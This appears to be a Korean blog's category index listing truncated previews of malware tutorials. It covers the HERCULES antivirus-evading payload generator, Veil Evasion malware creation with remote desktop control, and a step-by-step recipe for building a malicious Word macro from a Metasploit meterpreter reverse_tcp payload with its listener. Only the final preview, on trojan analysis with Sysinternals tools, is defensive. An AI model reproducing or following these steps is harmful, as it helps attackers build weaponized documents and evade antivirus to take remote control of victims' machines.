본문 바로가기

악성코드8

자동 악성코드 제작 툴 Hercules https://github.com/EgeBalci/HERCULES GitHub - EgeBalci/HERCULES: HERCULES is a special payload generator that can bypass antivirus softwares. HERCULES is a special payload generator that can bypass antivirus softwares. - GitHub - EgeBalci/HERCULES: HERCULES is a special payload generator that can bypass antivirus softwares. github.com 백신을 우회하는 payload generator입니다. [설치법] git clone https://github.. 2023. 12. 27.
Veil Evasion 악성코드 만들기 + rdesktop 원격조종 Veil Evasion은 Veil 프레임워크에서 사용할수 있는 악성코드 제작 도구입니다. https://github.com/Veil-Framework/Veil GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime) Veil 3.1.X (Check version info in Veil at runtime) - GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime) github.com 위 페이지에서 git clone으로 받아서 사용하시면 됩니다. [명령어 및 사용법] Veil 폴더에 가서 ./Veil.py로 실행 >use 1 - E.. 2023. 12. 27.
MS오피스 문서파일로 악성코드 만들기 Macro를 사용합니다. 1.use windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 7777 generate -f vba // generate로 각종 스크립트를 만드는데 -f는 아웃풋 옵션, vba는 비주얼베이직 애플리케이션 아웃풋입니다. 위 명령어를 담은 macro.rc 파일을 만들어줍니다. [호스트와 포트는 각자 설정] 2. msfconsole -r macro.rc로 실행 3.나온 vbs 구문을 복사해서 저장해둡니다. [#if... 뭐시기 부터 마지막 end sub 까지 전부 복사] 4.리스닝을 위해 핸들러를 틀어줍니다. [msfconsole -r handler.rc] 5.윈도우에서 워드를 틀고 매크로 기능에서 매크로 추가 -> 이름은 아무거.. 2023. 12. 27.
트로이목마 악성코드 분석해보기 [sysinternals 툴] https://docs.microsoft.com/ko-kr/sysinternals/downloads/ Sysinternals 유틸리티 - Sysinternals Sysinternals 유틸리티를 사용하여 Windows를 설치, 배포 및 유지 관리하는 방법을 평가하고 알아보세요. learn.microsoft.com 해당 사이트에서 악성코드 분석을 위한 도구들을 다운로드 받을수있습니다. 맨 위에 suite로 된 것을 받으면 모든 도구들을 받을 수 있습니다. 사용할 툴은 procexp 프로세스 익스플로러 와 procmon 프로세스 모니터 툴입니다. 1.procexp를 틀어둔 상태로 바이러스 파일과 감염되지 않은 파일을 실행시켜 줍니다. 차이점을 보면 바이러스 파일은 cpu 사용량이 많다는것, 용량이 더 높다는.. 2023. 12. 27.